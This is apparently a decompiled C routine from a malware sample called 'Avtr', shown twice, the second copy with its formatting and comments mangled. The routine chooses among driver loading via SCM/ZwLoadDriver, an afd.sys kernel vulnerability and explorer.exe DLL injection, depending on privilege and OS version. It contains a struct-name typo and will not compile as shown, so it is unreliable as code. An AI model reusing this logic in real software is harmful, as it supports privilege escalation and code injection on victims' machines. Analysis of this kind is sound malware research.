SouhailHammou/Avtr_setup_list.c

## Avtr_setup_list.c
typedef struct _avtr_listelem
{
	struct _avtr_listelem* next;
	struct _avtr_listelem* prev;
	DWORD technique; /*0x08*/
	DWORD privilege_value; /*0x0C*/
	DWORD n_tries; /*0x10*/
	DWORD milliseconds; /*0x14*/
} avtr_listelem, *pavtr_listelem;

pavtr_listelem gList;
int gElemCount;

BOOL Avtr_setup_list()
{
	pavtr_listelem Elem = NULL;
	DWORD privilege_value_val;
	if ( IsAdmin )
	{
		/*appends element at the end of the list or initializes the list head (gList) if it's NULL*/
		Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);

		if ( Elem )
		{
			if ( ! gList )
			{
				gList = Elem;
			}
			Elem->technique = 0x80000000; //SCM or ZwLoadDriver
			Elem->privilege_value = 2; //Administrator
			Elem->n_tries = 1;
			Elem->milliseconds = 30000;
		}

	}
	if ( Avtr_isVulnerable("afd.sys",2011,10) )
	{
		Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);
		if ( Elem )
		{
			if ( ! gList )
			{
				gList = Elem;
			}
			Elem->technique = 0x80000000;//afd.sys vulnerability
			Elem->privilege_value = 1;//ordinary user
			Elem->n_tries = 1;
			Elem->milliseconds = 30000;
		}
	}
	if ( IsAdmin )
	{
		privilege_value_val = 2;
	}
	else if ( ServicePackMajor_defined >= 8 ) ////Vista and above
	{
		privilege_value_val = 0x80000002;
	}
	else
	{
		goto ret;
	}

	Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);
	if ( ! gList )
	{
		gList = Elem;
	}
	Elem->technique = 0x80000001;//explorer.exe DLL injection
	Elem->privilege_value = privilege_value_val;
	Elem->n_tries = 1;
	Elem->milliseconds = 30000;

	ret :
	return (gElemCount > 0);

}
	typedef struct _avtr_listelem
	{
	struct _avtr_listelem* next;
	struct _avtr_listelem* prev;
	DWORD technique; /0x08/
	DWORD privilege_value; /0x0C/
	DWORD n_tries; /0x10/
	DWORD milliseconds; /0x14/
	} avtr_listelem, *pavtr_listelem;

	pavtr_listelem gList;
	int gElemCount;

	BOOL Avtr_setup_list()
	{
	pavtr_listelem Elem = NULL;
	DWORD privilege_value_val;
	if ( IsAdmin )
	{
	/appends element at the end of the list or initializes the list head (gList) if it's NULL/
	Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);

	if ( Elem )
	{
	if ( ! gList )
	{
	gList = Elem;
	}
	Elem->technique = 0x80000000; //SCM or ZwLoadDriver
	Elem->privilege_value = 2; //Administrator
	Elem->n_tries = 1;
	Elem->milliseconds = 30000;
	}

	}
	if ( Avtr_isVulnerable("afd.sys",2011,10) )
	{
	Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);
	if ( Elem )
	{
	if ( ! gList )
	{
	gList = Elem;
	}
	Elem->technique = 0x80000000;//afd.sys vulnerability
	Elem->privilege_value = 1;//ordinary user
	Elem->n_tries = 1;
	Elem->milliseconds = 30000;
	}
	}
	if ( IsAdmin )
	{
	privilege_value_val = 2;
	}
	else if ( ServicePackMajor_defined >= 8 ) ////Vista and above
	{
	privilege_value_val = 0x80000002;
	}
	else
	{
	goto ret;
	}

	Elem = List_appendElem(&gList,sizeof(avtr_listeelem),&gElemCount,hHeap);
	if ( ! gList )
	{
	gList = Elem;
	}
	Elem->technique = 0x80000001;//explorer.exe DLL injection
	Elem->privilege_value = privilege_value_val;
	Elem->n_tries = 1;
	Elem->milliseconds = 30000;

	ret :
	return (gElemCount > 0);

	}